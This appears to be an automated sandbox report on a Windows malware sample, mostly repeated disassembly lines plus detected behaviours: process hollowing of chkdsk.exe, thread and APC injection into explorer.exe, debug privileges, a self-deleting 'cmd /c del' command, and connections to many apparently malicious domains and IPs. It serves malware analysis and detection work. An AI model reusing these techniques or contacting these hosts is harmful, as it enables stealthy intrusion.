Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05492581 mov eax, dword ptr fs:[00000030h] 31_2_05492581
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05492581 mov eax, dword ptr fs:[00000030h] 31_2_05492581
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h] 31_2_05462D8A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h] 31_2_05462D8A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h] 31_2_05462D8A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h] 31_2_05462D8A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05462D8A mov eax, dword ptr fs:[00000030h] 31_2_05462D8A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549FD9B mov eax, dword ptr fs:[00000030h] 31_2_0549FD9B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549FD9B mov eax, dword ptr fs:[00000030h] 31_2_0549FD9B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054935A1 mov eax, dword ptr fs:[00000030h] 31_2_054935A1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05491DB5 mov eax, dword ptr fs:[00000030h] 31_2_05491DB5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05491DB5 mov eax, dword ptr fs:[00000030h] 31_2_05491DB5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05491DB5 mov eax, dword ptr fs:[00000030h] 31_2_05491DB5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055305AC mov eax, dword ptr fs:[00000030h] 31_2_055305AC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055305AC mov eax, dword ptr fs:[00000030h] 31_2_055305AC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549A44B mov eax, dword ptr fs:[00000030h] 31_2_0549A44B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FC450 mov eax, dword ptr fs:[00000030h] 31_2_054FC450
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FC450 mov eax, dword ptr fs:[00000030h] 31_2_054FC450
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548746D mov eax, dword ptr fs:[00000030h] 31_2_0548746D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6C0A mov eax, dword ptr fs:[00000030h] 31_2_054E6C0A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6C0A mov eax, dword ptr fs:[00000030h] 31_2_054E6C0A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6C0A mov eax, dword ptr fs:[00000030h] 31_2_054E6C0A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6C0A mov eax, dword ptr fs:[00000030h] 31_2_054E6C0A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521C06 mov eax, dword ptr fs:[00000030h] 31_2_05521C06
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0553740D mov eax, dword ptr fs:[00000030h] 31_2_0553740D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0553740D mov eax, dword ptr fs:[00000030h] 31_2_0553740D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0553740D mov eax, dword ptr fs:[00000030h] 31_2_0553740D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549BC2C mov eax, dword ptr fs:[00000030h] 31_2_0549BC2C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05538CD6 mov eax, dword ptr fs:[00000030h] 31_2_05538CD6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055214FB mov eax, dword ptr fs:[00000030h] 31_2_055214FB
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6CF0 mov eax, dword ptr fs:[00000030h] 31_2_054E6CF0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6CF0 mov eax, dword ptr fs:[00000030h] 31_2_054E6CF0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6CF0 mov eax, dword ptr fs:[00000030h] 31_2_054E6CF0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547849B mov eax, dword ptr fs:[00000030h] 31_2_0547849B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547EF40 mov eax, dword ptr fs:[00000030h] 31_2_0547EF40
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547FF60 mov eax, dword ptr fs:[00000030h] 31_2_0547FF60
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05538F6A mov eax, dword ptr fs:[00000030h] 31_2_05538F6A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549A70E mov eax, dword ptr fs:[00000030h] 31_2_0549A70E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549A70E mov eax, dword ptr fs:[00000030h] 31_2_0549A70E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0553070D mov eax, dword ptr fs:[00000030h] 31_2_0553070D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0553070D mov eax, dword ptr fs:[00000030h] 31_2_0553070D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548F716 mov eax, dword ptr fs:[00000030h] 31_2_0548F716
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FFF10 mov eax, dword ptr fs:[00000030h] 31_2_054FFF10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FFF10 mov eax, dword ptr fs:[00000030h] 31_2_054FFF10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05464F2E mov eax, dword ptr fs:[00000030h] 31_2_05464F2E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05464F2E mov eax, dword ptr fs:[00000030h] 31_2_05464F2E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549E730 mov eax, dword ptr fs:[00000030h] 31_2_0549E730
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A37F5 mov eax, dword ptr fs:[00000030h] 31_2_054A37F5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05478794 mov eax, dword ptr fs:[00000030h] 31_2_05478794
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E7794 mov eax, dword ptr fs:[00000030h] 31_2_054E7794
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E7794 mov eax, dword ptr fs:[00000030h] 31_2_054E7794
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E7794 mov eax, dword ptr fs:[00000030h] 31_2_054E7794
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h] 31_2_05477E41
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h] 31_2_05477E41
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h] 31_2_05477E41
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h] 31_2_05477E41
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h] 31_2_05477E41
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h] 31_2_05477E41
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552AE44 mov eax, dword ptr fs:[00000030h] 31_2_0552AE44
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552AE44 mov eax, dword ptr fs:[00000030h] 31_2_0552AE44
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547766D mov eax, dword ptr fs:[00000030h] 31_2_0547766D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h] 31_2_0548AE73
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h] 31_2_0548AE73
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h] 31_2_0548AE73
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h] 31_2_0548AE73
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h] 31_2_0548AE73
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546C600 mov eax, dword ptr fs:[00000030h] 31_2_0546C600
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546C600 mov eax, dword ptr fs:[00000030h] 31_2_0546C600
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546C600 mov eax, dword ptr fs:[00000030h] 31_2_0546C600
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05498E00 mov eax, dword ptr fs:[00000030h] 31_2_05498E00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549A61C mov eax, dword ptr fs:[00000030h] 31_2_0549A61C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549A61C mov eax, dword ptr fs:[00000030h] 31_2_0549A61C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521608 mov eax, dword ptr fs:[00000030h] 31_2_05521608
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546E620 mov eax, dword ptr fs:[00000030h] 31_2_0546E620
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0551FE3F mov eax, dword ptr fs:[00000030h] 31_2_0551FE3F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05538ED6 mov eax, dword ptr fs:[00000030h] 31_2_05538ED6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054936CC mov eax, dword ptr fs:[00000030h] 31_2_054936CC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A8EC7 mov eax, dword ptr fs:[00000030h] 31_2_054A8EC7
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0551FEC0 mov eax, dword ptr fs:[00000030h] 31_2_0551FEC0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054776E2 mov eax, dword ptr fs:[00000030h] 31_2_054776E2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054916E0 mov ecx, dword ptr fs:[00000030h] 31_2_054916E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FFE87 mov eax, dword ptr fs:[00000030h] 31_2_054FFE87
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E46A7 mov eax, dword ptr fs:[00000030h] 31_2_054E46A7
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05530EA5 mov eax, dword ptr fs:[00000030h] 31_2_05530EA5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05530EA5 mov eax, dword ptr fs:[00000030h] 31_2_05530EA5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05530EA5 mov eax, dword ptr fs:[00000030h] 31_2_05530EA5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548B944 mov eax, dword ptr fs:[00000030h] 31_2_0548B944
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548B944 mov eax, dword ptr fs:[00000030h] 31_2_0548B944
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546C962 mov eax, dword ptr fs:[00000030h] 31_2_0546C962
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546B171 mov eax, dword ptr fs:[00000030h] 31_2_0546B171
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546B171 mov eax, dword ptr fs:[00000030h] 31_2_0546B171
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05469100 mov eax, dword ptr fs:[00000030h] 31_2_05469100
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05469100 mov eax, dword ptr fs:[00000030h] 31_2_05469100
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05469100 mov eax, dword ptr fs:[00000030h] 31_2_05469100
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05484120 mov eax, dword ptr fs:[00000030h] 31_2_05484120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05484120 mov eax, dword ptr fs:[00000030h] 31_2_05484120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05484120 mov eax, dword ptr fs:[00000030h] 31_2_05484120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05484120 mov eax, dword ptr fs:[00000030h] 31_2_05484120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05484120 mov ecx, dword ptr fs:[00000030h] 31_2_05484120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549513A mov eax, dword ptr fs:[00000030h] 31_2_0549513A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549513A mov eax, dword ptr fs:[00000030h] 31_2_0549513A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054F41E8 mov eax, dword ptr fs:[00000030h] 31_2_054F41E8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546B1E1 mov eax, dword ptr fs:[00000030h] 31_2_0546B1E1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546B1E1 mov eax, dword ptr fs:[00000030h] 31_2_0546B1E1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546B1E1 mov eax, dword ptr fs:[00000030h] 31_2_0546B1E1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548C182 mov eax, dword ptr fs:[00000030h] 31_2_0548C182
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549A185 mov eax, dword ptr fs:[00000030h] 31_2_0549A185
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05492990 mov eax, dword ptr fs:[00000030h] 31_2_05492990
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E69A6 mov eax, dword ptr fs:[00000030h] 31_2_054E69A6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054961A0 mov eax, dword ptr fs:[00000030h] 31_2_054961A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054961A0 mov eax, dword ptr fs:[00000030h] 31_2_054961A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E51BE mov eax, dword ptr fs:[00000030h] 31_2_054E51BE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E51BE mov eax, dword ptr fs:[00000030h] 31_2_054E51BE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E51BE mov eax, dword ptr fs:[00000030h] 31_2_054E51BE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E51BE mov eax, dword ptr fs:[00000030h] 31_2_054E51BE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055249A4 mov eax, dword ptr fs:[00000030h] 31_2_055249A4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055249A4 mov eax, dword ptr fs:[00000030h] 31_2_055249A4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055249A4 mov eax, dword ptr fs:[00000030h] 31_2_055249A4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055249A4 mov eax, dword ptr fs:[00000030h] 31_2_055249A4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov eax, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov eax, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov eax, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF mov eax, dword ptr fs:[00000030h] 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05480050 mov eax, dword ptr fs:[00000030h] 31_2_05480050
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05480050 mov eax, dword ptr fs:[00000030h] 31_2_05480050
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05522073 mov eax, dword ptr fs:[00000030h] 31_2_05522073
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05531074 mov eax, dword ptr fs:[00000030h] 31_2_05531074
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05534015 mov eax, dword ptr fs:[00000030h] 31_2_05534015
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05534015 mov eax, dword ptr fs:[00000030h] 31_2_05534015
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E7016 mov eax, dword ptr fs:[00000030h] 31_2_054E7016
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E7016 mov eax, dword ptr fs:[00000030h] 31_2_054E7016
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E7016 mov eax, dword ptr fs:[00000030h] 31_2_054E7016
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549002D mov eax, dword ptr fs:[00000030h] 31_2_0549002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549002D mov eax, dword ptr fs:[00000030h] 31_2_0549002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549002D mov eax, dword ptr fs:[00000030h] 31_2_0549002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549002D mov eax, dword ptr fs:[00000030h] 31_2_0549002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549002D mov eax, dword ptr fs:[00000030h] 31_2_0549002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547B02A mov eax, dword ptr fs:[00000030h] 31_2_0547B02A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547B02A mov eax, dword ptr fs:[00000030h] 31_2_0547B02A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547B02A mov eax, dword ptr fs:[00000030h] 31_2_0547B02A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547B02A mov eax, dword ptr fs:[00000030h] 31_2_0547B02A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548A830 mov eax, dword ptr fs:[00000030h] 31_2_0548A830
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548A830 mov eax, dword ptr fs:[00000030h] 31_2_0548A830
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548A830 mov eax, dword ptr fs:[00000030h] 31_2_0548A830
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548A830 mov eax, dword ptr fs:[00000030h] 31_2_0548A830
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h] 31_2_054FB8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FB8D0 mov ecx, dword ptr fs:[00000030h] 31_2_054FB8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h] 31_2_054FB8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h] 31_2_054FB8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h] 31_2_054FB8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h] 31_2_054FB8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054640E1 mov eax, dword ptr fs:[00000030h] 31_2_054640E1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054640E1 mov eax, dword ptr fs:[00000030h] 31_2_054640E1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054640E1 mov eax, dword ptr fs:[00000030h] 31_2_054640E1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054658EC mov eax, dword ptr fs:[00000030h] 31_2_054658EC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548B8E4 mov eax, dword ptr fs:[00000030h] 31_2_0548B8E4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548B8E4 mov eax, dword ptr fs:[00000030h] 31_2_0548B8E4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05469080 mov eax, dword ptr fs:[00000030h] 31_2_05469080
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E3884 mov eax, dword ptr fs:[00000030h] 31_2_054E3884
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E3884 mov eax, dword ptr fs:[00000030h] 31_2_054E3884
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A90AF mov eax, dword ptr fs:[00000030h] 31_2_054A90AF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h] 31_2_054920A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h] 31_2_054920A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h] 31_2_054920A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h] 31_2_054920A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h] 31_2_054920A0
Enables debug privileges
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.creditmystartup.com
Source: C:\Windows\explorer.exe Domain query: www.dunn-labs.com
Source: C:\Windows\explorer.exe Network Connect: 184.168.131.241 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.thehomechef.global
Source: C:\Windows\explorer.exe Network Connect: 31.44.185.28 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.mothererph.com
Source: C:\Windows\explorer.exe Domain query: www.mikecdmusic.com
Source: C:\Windows\explorer.exe Domain query: www.bloomandbrewcafe.com
Source: C:\Windows\explorer.exe Domain query: www.oubacm.com
Source: C:\Windows\explorer.exe Domain query: www.ooweesports.com
Source: C:\Windows\explorer.exe Domain query: www.tearor.com
Source: C:\Windows\explorer.exe Domain query: www.foeweifgoor73dz.com
Source: C:\Windows\explorer.exe Domain query: www.amazonautomationbusiness.com
Source: C:\Windows\explorer.exe Network Connect: 198.50.252.64 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.gentrypartyof8.com
Source: C:\Windows\explorer.exe Network Connect: 35.208.122.142 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.21.53.7 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.howtovvbucks.com
Source: C:\Windows\explorer.exe Network Connect: 212.32.237.90 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.17.18.196 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 66.235.200.146 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.33.252.45 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.pacleanfuel.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.193.166.57 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.yellow-wink.com
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Thread register set: target process: 3388 Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Thread register set: target process: 3388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: E30000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe' Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\F63V4i8eZU.exe' Jump to behavior
Source: explorer.exe, 0000001D.00000000.454581966.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: explorer.exe, 0000001D.00000000.454839868.0000000001980000.00000002.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1287403199.00000000068D0000.00000002.00000001.sdmp Binary or memory string: Program Manager
